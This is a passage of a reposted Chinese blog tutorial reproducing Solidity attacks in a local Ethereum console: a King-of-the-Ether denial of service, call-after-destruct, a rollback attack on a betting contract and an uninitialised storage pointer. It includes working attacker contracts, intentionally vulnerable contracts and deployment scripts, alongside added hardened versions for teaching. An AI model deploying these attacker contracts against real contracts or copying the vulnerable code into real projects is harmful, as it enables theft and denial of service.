     data: '0x606060405267016345785d8a0000600255341561001b57600080fd5b33600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061007761007c6401000000000261043f176401000000009004565b610086565b6001600081905550565b6104f5806100956000396000f300606060405260043610610078576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063382cf0a61461007a57806341c0e1b5146100e45780636898f82b146100f95780639c675eaa14610111578063c533913214610166578063cfd8a1751461018f575b005b341561008557600080fd5b61009b60048080359060200190919050506101b8565b604051808373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020018281526020019250505060405180910390f35b34156100ef57600080fd5b6100f761020b565b005b61010f600480803590602001909190505061028e565b005b341561011c57600080fd5b61012461040d565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b341561017157600080fd5b610179610433565b6040518082815260200191505060405180910390f35b341561019a57600080fd5b6101a2610439565b6040518082815260200191505060405180910390f35b6004818154811015156101c757fe5b90600052602060002090600202016000915090508060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16908060010154905082565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614801561026e5750620151806001540142115b1561028c573373ffffffffffffffffffffffffffffffffffffffff16ff5b565b600060025434101580156102a35750600a8211155b15156102ae57600080fd5b338160000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508181600101819055506004805480600101828161030e9190610449565b916000526020600020906002020160008390919091506000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168160
000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600182015481600101555050506000548214156103fa573373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f1935050505015156103f957600080fd5b5b61040261043f565b426001819055505050565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60015481565b60025481565b6001600081905550565b81548183558181151161047657600202816002028360005260206000209182019101610475919061047b565b5b505050565b6104c691905b808211156104c257600080820160006101000a81549073ffffffffffffffffffffffffffffffffffffffff0219169055600182016000905550600201610481565b5090565b905600a165627a7a7230582029d7523a92663fda0e1c1500a9e90438e3ee9f19b84b0d40b6736d9c85e2b5c10029', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x7d0721e53dba437ece0f8611696573cf17b75179 transactionHash: 0xbc852383090eb0a78e82a4d6ec0eebe69f7f2d2930f88bc48746880d38b1bb5f

King of the Ether Throne attack (DoS)

pragma solidity ^0.4.10;

contract PresidentOfCountry {
    address public president;
    uint256 public price;

    function PresidentOfCountry(uint256 _price) {
        require(_price > 0);
        price = _price;
        president = msg.sender;
    }

    function becomePresident() payable {
        require(msg.value >= price); // must pay the price to become president
        president.transfer(price);   // we pay the previous president
        president = msg.sender;      // we crown the new president
        price = price * 2;           // we double the price to become president
    }

}

contract Attack { 
    // The fallback always reverts, so once this contract is president,
    // president.transfer(price) in becomePresident() fails and nobody can take the throne.
    function () { revert(); }

    function Attack(address _target) payable {
        _target.call.value(msg.value)(bytes4(keccak256("becomePresident()")));
    }
}

The first contract, PresidentOfCountry:

var _price = 10 ;
var presidentofcountryContract =  web3.eth.contract([{"constant":false,"inputs":[],"name":"becomePresident","outputs":[],"payable":true,"type":"function","stateMutability":"payable"},{"constant":true,"inputs":[],"name":"president","outputs":[{"name":"","type":"address"}],"payable":false,"type":"function","stateMutability":"view"},{"constant":true,"inputs":[],"name":"price","outputs":[{"name":"","type":"uint256"}],"payable":false,"type":"function","stateMutability":"view"},{"inputs":[{"name":"_price","type":"uint256"}],"payable":false,"type":"constructor","stateMutability":"nonpayable"}]);
var presidentofcountry = presidentofcountryContract.new( _price,
{
     data: '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', 
    
     from: web3.eth.accounts[0], 
     gas: '10000000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x025b689415e02b896d6cc021ad56ff38e8ae0a93 transactionHash: 0x3109ad838eb20a89f8513f3f411f8872022a8d4d6f2560eff8ad1b0a96e380dc

Second contract, Attack:

Passing msg.value when deploying, i.e. funding the contract at deployment

Add `value: xxx` in the options object where `value: 40` appears in the snippet below; if value is the last option, it takes no trailing comma.

var _target = "0x025b689415e02b896d6cc021ad56ff38e8ae0a93";
var attackContract =  web3.eth.contract([{"inputs":[{"name":"_target","type":"address"}],"payable":true,"type":"constructor","stateMutability":"payable"},{"payable":false,"type":"fallback","stateMutability":"nonpayable"}]);
var attack = attackContract.new(_target,
{
     data: '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', 
    

     from: web3.eth.accounts[1], 
     gas: '4700000',
     value: 40
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x64a8df8e846d40335b9f3072e4e187568646f879 transactionHash: 0x7effac1203afb6a5b2dd500f3ee8398a9b24611d0dc6f3843da7784040e2831f
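A hardened PresidentOfCountry, added here as an example and not code from the original post. The DoS works because becomePresident() pushes the refund to the previous president with transfer(); a president whose fallback reverts (the Attack contract above) therefore blocks every later caller. The fix is the pull-payment (withdraw) pattern: credit the refund in a mapping and let each payee withdraw it in its own transaction, so a recipient that rejects ether only hurts itself. The contract name PresidentOfCountryPull and the names pendingWithdrawals and withdraw are my own choices.

```solidity
pragma solidity ^0.4.24;

// Added example: pull-payment variant of the page's PresidentOfCountry.
// Names (PresidentOfCountryPull, pendingWithdrawals, withdraw) are assumptions.
contract PresidentOfCountryPull {
    address public president;
    uint256 public price;

    // Ether owed to each address; paid out only when that address asks for it.
    mapping(address => uint256) public pendingWithdrawals;

    constructor(uint256 _price) public {
        require(_price > 0);
        price = _price;
        president = msg.sender;
    }

    function becomePresident() public payable {
        require(msg.value >= price, "must pay at least the current price");

        // Credit instead of transfer: no external call here, so a reverting
        // president cannot make this function fail for anyone else.
        pendingWithdrawals[president] += price;
        // Any excess over the price is credited back to the buyer as well.
        pendingWithdrawals[msg.sender] += msg.value - price;

        president = msg.sender;

        // Double the price, but refuse to wrap around (see the integer overflow section).
        uint256 next = price * 2;
        require(next / 2 == price, "price overflow");
        price = next;
    }

    // Each payee pulls its own balance. Zeroing the balance before the external
    // call (checks-effects-interactions) keeps this safe against re-entrancy.
    function withdraw() public {
        uint256 amount = pendingWithdrawals[msg.sender];
        require(amount > 0, "nothing to withdraw");
        pendingWithdrawals[msg.sender] = 0;
        msg.sender.transfer(amount);
    }
}
```

To check it against the page's Attack: deploy this contract with _price = 10, deploy Attack with value: 40 pointing at it (Attack becomes president, price becomes 20), then call becomePresident from a third account with value 20. The call succeeds; the 20 wei owed to Attack accumulates in pendingWithdrawals[attack.address], where its reverting fallback blocks nobody but itself.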

call-after-destruct attack
pragma solidity ^0.4.24;
 
contract selfdestructGame{
    address owner;
 
    constructor() public payable {
        owner = msg.sender;
    }
     
    function ownedEth() public view returns(uint256){
        return address(this).balance;
    }

    // Accepts deposits. After selfdestruct the address has no code any more,
    // but a transaction to deposit() with value still succeeds: the ether is
    // credited to a dead address and is lost for good.
    function deposit() public payable{}
 
    // No access control: anyone can destroy the contract and send its whole
    // balance to _who. This is the bug being reproduced and is kept on purpose.
    function destruct(address _who) public {
        selfdestruct(_who);
    }
}
var selfdestructgameContract =  web3.eth.contract([{"constant":false,"inputs":[{"name":"_who","type":"address"}],"name":"destruct","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"constant":true,"inputs":[],"name":"ownedEth","outputs":[{"name":"","type":"uint256"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[],"name":"deposit","outputs":[],"payable":true,"stateMutability":"payable","type":"function"},{"inputs":[],"payable":true,"stateMutability":"payable","type":"constructor"}]);
var selfdestructgame = selfdestructgameContract.new({
     data: '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', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000',
     value:1000000000000000000
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Contract mined! address: 0x4973329ea175750eb8eb3ce89c6fb4935370e502 transactionHash: 0x4e2df136792bb470ed450355e64d2f4dbf0eb13d03140fd124f415505178672d
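Two defences for the call-after-destruct scenario, added here as an example and not code from the original post. On the game side, selfdestruct is restricted to the owner and can only send the balance to the owner. On the caller side, a contract that forwards ether checks extcodesize before sending, because a raw .call.value() to a destroyed address succeeds and simply burns the ether. The contract names SelfdestructGameSafe and SafeDepositor and the function depositTo are my own.

```solidity
pragma solidity ^0.4.24;

// Added example: owner-gated selfdestruct. Names are assumptions.
contract SelfdestructGameSafe {
    address public owner;

    constructor() public payable {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        require(msg.sender == owner, "only owner");
        _;
    }

    function ownedEth() public view returns (uint256) {
        return address(this).balance;
    }

    function deposit() public payable {}

    // Only the owner may destroy the contract, and the balance can only go to the owner.
    function destruct() public onlyOwner {
        selfdestruct(owner);
    }
}

// Added example: caller-side guard against paying into a destroyed contract.
contract SafeDepositor {
    // Size of the code deployed at _addr; 0 for an EOA or a destroyed contract.
    function codeSize(address _addr) internal view returns (uint256 size) {
        assembly { size := extcodesize(_addr) }
    }

    // Forwards msg.value to _target.deposit(). Reverts, instead of burning the
    // ether, when the target has no code (destroyed, or never a contract).
    function depositTo(address _target) public payable {
        require(codeSize(_target) > 0, "target has no code: destroyed or not a contract");
        // Solidity's typed external calls already revert when the callee has no
        // code, but a raw .call.value() does not, so the explicit check above is
        // what protects this path.
        bool ok = _target.call.value(msg.value)(bytes4(keccak256(abi.encodePacked("deposit()"))));
        require(ok, "deposit failed");
    }
}
```

To reproduce the difference in the Geth console: after destruct() has run on the page's selfdestructGame, eth.getCode(selfdestructgame.address) returns "0x", selfdestructgame.deposit.sendTransaction({from: acc0, value: 1}) still goes through and eth.getBalance of that address grows with ether nobody can recover, while SafeDepositor.depositTo pointed at the same address reverts.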

Rollback attack
pragma solidity ^0.4.19;

contract Alice{
    // Deterministic stand-in for the game's random number. The attack does not
    // depend on how rand is produced, only on bet and payout sharing one transaction.
    function random() internal returns (uint8){
        return 11;
    }

    function() payable{}   // lets the house be funded with the prize pool

    function guess(uint8 num) payable public returns (bool){
        require(msg.value >= 1 ether);

        uint8 rand = random();
        if(num > rand-3 && num < rand+3){
            msg.sender.transfer(2 ether);   // win: prize paid in the same transaction as the bet
            return true;
        }
        else{
            return false;                   // loss: the 1 ether stake stays with Alice
        }
    }
}

contract Bob{
    // Payable fallback so Bob can hold the stake and receive the 2 ether prize
    // (without it Alice's transfer to Bob would fail).
    function() payable {}

    function rollback(Alice alice, uint8 num) public {
        uint256 balance1 = this.balance;
        // Selector and argument type must match Alice.guess(uint8). 100000 gas is
        // enough for guess() and its internal transfer; 10000 was not.
        bool isSucceed = address(alice).call.gas(100000).value(1 ether)(bytes4(keccak256("guess(uint8)")), num);
        uint256 balance2 = this.balance;

        // No win (or the call failed): revert, which hands the 1 ether stake back to Bob.
        if(!isSucceed || balance2 < balance1){
            revert();
        }
    }
}

First contract, Alice:

var aliceContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"num","type":"uint8"}],"name":"guess","outputs":[{"name":"","type":"bool"}],"payable":true,"stateMutability":"payable","type":"function"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var alice = aliceContract.new({
     data: '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', 
  
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })

Second contract, Bob:

var bobContract = web3.eth.contract([{"constant":false,"inputs":[{"name":"alice","type":"address"},{"name":"num","type":"uint8"}],"name":"rollback","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"payable":true,"stateMutability":"payable","type":"fallback"}]);
var bob = bobContract.new({
     data: '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', 
    
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
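A version of Alice that a rollback contract cannot profit from, added here as an example and not code from the original post. Bob's trick works because the stake leaves Bob, the outcome is decided and the prize is paid all inside one transaction, so Bob reverts whenever it lost and gets the stake back. Splitting the game into two transactions removes that option: placeBet locks the stake, and settle, callable by anyone in a later block, decides the outcome, so a revert during settlement no longer undoes the bet. The contract name AliceTwoPhase, the function names and the use of blockhash as the randomness source are my own choices; blockhash is only an illustration, not a secure RNG.

```solidity
pragma solidity ^0.4.24;

// Added example: two-phase variant of the page's Alice. Names are assumptions.
contract AliceTwoPhase {
    struct Bet {
        uint8 num;
        uint256 amount;
        uint256 blockNumber;   // block in which the bet was placed
    }

    mapping(address => Bet) public bets;
    mapping(address => uint256) public unclaimed;   // prizes a recipient refused

    function() public payable {}   // house funding, as in the page's Alice

    // Phase 1: lock the stake. Nothing is decided yet, so reverting here only
    // cancels the player's own bet.
    function placeBet(uint8 _num) public payable {
        require(msg.value >= 1 ether, "stake is 1 ether");
        require(bets[msg.sender].amount == 0, "settle the previous bet first");
        bets[msg.sender] = Bet(_num, msg.value, block.number);
    }

    // Phase 2: anyone (in particular the house) may settle once the block after
    // the bet exists, so a losing player cannot escape by refusing to settle.
    function settle(address _player) public returns (bool won) {
        Bet memory b = bets[_player];
        require(b.amount > 0, "no open bet");
        uint256 target = b.blockNumber + 1;
        require(block.number > target, "wait for the block after the bet");

        delete bets[_player];   // effects before any interaction

        if (block.number - target >= 256) {
            return false;       // blockhash no longer available: stake is forfeited
        }

        // Illustration only: derive rand from a block hash the player could not
        // know when placing the bet. Same winning window as the page's Alice.
        uint8 rand = uint8(uint256(blockhash(target)) % 20);
        uint256 n = b.num;
        won = (n + 3 > rand) && (n < uint256(rand) + 3);

        if (won) {
            uint256 payout = 2 ether;
            // send() instead of transfer(): a recipient whose fallback reverts
            // cannot block settlement; its prize is parked for a later claim().
            if (!_player.send(payout)) {
                unclaimed[_player] += payout;
            }
        }
    }

    function claim() public {
        uint256 amount = unclaimed[msg.sender];
        require(amount > 0, "nothing to claim");
        unclaimed[msg.sender] = 0;
        msg.sender.transfer(amount);
    }
}
```

Against this contract Bob's rollback() hits the payable fallback (there is no guess(uint8)), sees its balance drop and reverts, gaining nothing; a Bob rewritten to call placeBet() locks 1 ether that only settle() can move. A blunter mitigation for the same attack is require(msg.sender == tx.origin) in guess(), which rejects every contract caller, including legitimate ones such as wallets.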
Shadow variable attack (uninitialised storage pointer)
pragma solidity 0.4.26;

contract Shadow {
    bool public unlocked = false;   // slot0

    struct Record{
        bytes32 name;
        address addr;
    }

    mapping(address => Record) public registRecord; //slot1
    event Log(address addr, bool msg);

    function regist(bytes32 _name, address _addr) public {
        // Uninitialised storage pointer (a warning in 0.4.x, an error from 0.5.0):
        // newRecord aliases the contract's own storage starting at slot 0 instead
        // of a fresh Record, so the two writes below land on unlocked and registRecord.
        Record newRecord; 
        newRecord.name = _name; // slot0: overwrites unlocked; any _name whose lowest byte is non-zero reads back as true
        newRecord.addr = _addr; // slot1: overwrites the mapping's base slot

        emit Log(msg.sender, unlocked);
    }
}
var shadowContract = web3.eth.contract([{"constant":true,"inputs":[{"name":"","type":"address"}],"name":"registRecord","outputs":[{"name":"name","type":"bytes32"},{"name":"addr","type":"address"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":true,"inputs":[],"name":"unlocked","outputs":[{"name":"","type":"bool"}],"payable":false,"stateMutability":"view","type":"function"},{"constant":false,"inputs":[{"name":"_name","type":"bytes32"},{"name":"_addr","type":"address"}],"name":"regist","outputs":[],"payable":false,"stateMutability":"nonpayable","type":"function"},{"anonymous":false,"inputs":[{"indexed":false,"name":"addr","type":"address"},{"indexed":false,"name":"msg","type":"bool"}],"name":"Log","type":"event"}]);
var shadow = shadowContract.new({
     data: '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', 
   
     from: web3.eth.accounts[0], 
     gas: '4700000'
   }, function (e, contract){
    console.log(e, contract);
    if (typeof contract.address !== 'undefined') {
         console.log('Contract mined! address: ' + contract.address + ' transactionHash: ' + contract.transactionHash);
    }
 })
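The same contract with the storage pointer fixed, added here as an example and not code from the original post. Two correct forms are shown: build the record in memory and copy it into the mapping entry, or take a storage reference to the mapping entry itself. In both, unlocked stays false no matter what _name is passed. The contract name ShadowFixed and the function registDirect are my own; the event parameter is renamed because the original name msg shadows the msg global.

```solidity
pragma solidity 0.4.26;

// Added example: the page's Shadow contract with the storage pointer fixed.
// Names ShadowFixed and registDirect are assumptions.
contract ShadowFixed {
    bool public unlocked = false;   // slot 0, never touched by regist()

    struct Record {
        bytes32 name;
        address addr;
    }

    // Slot 1 holds only the mapping's base; each entry lives at keccak256(key . 1).
    mapping(address => Record) public registRecord;
    event Log(address addr, bool unlockedNow);

    // Form 1: explicit memory record, then one copy into storage.
    function regist(bytes32 _name, address _addr) public {
        Record memory newRecord;        // lives in memory, not at slot 0
        newRecord.name = _name;
        newRecord.addr = _addr;
        registRecord[_addr] = newRecord;
        emit Log(msg.sender, unlocked); // still false
    }

    // Form 2: storage reference to the mapping entry itself.
    function registDirect(bytes32 _name, address _addr) public {
        Record storage r = registRecord[_addr];
        r.name = _name;
        r.addr = _addr;
        emit Log(msg.sender, unlocked); // still false
    }
}
```

To see the difference in the Geth console, call regist with a name whose lowest byte is non-zero, e.g. "0x0000000000000000000000000000000000000000000000000000000000000001": on the page's Shadow, shadow.unlocked() then returns true, because the bool is read from the low byte of slot 0 that the bytes32 just overwrote; on ShadowFixed it stays false and registRecord(_addr) returns the stored name and address.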

Feel free to share; when reposting, please credit the source: 内存溢出

Original URL: http://outofmemory.cn/zaji/2990405.html

2022-09-23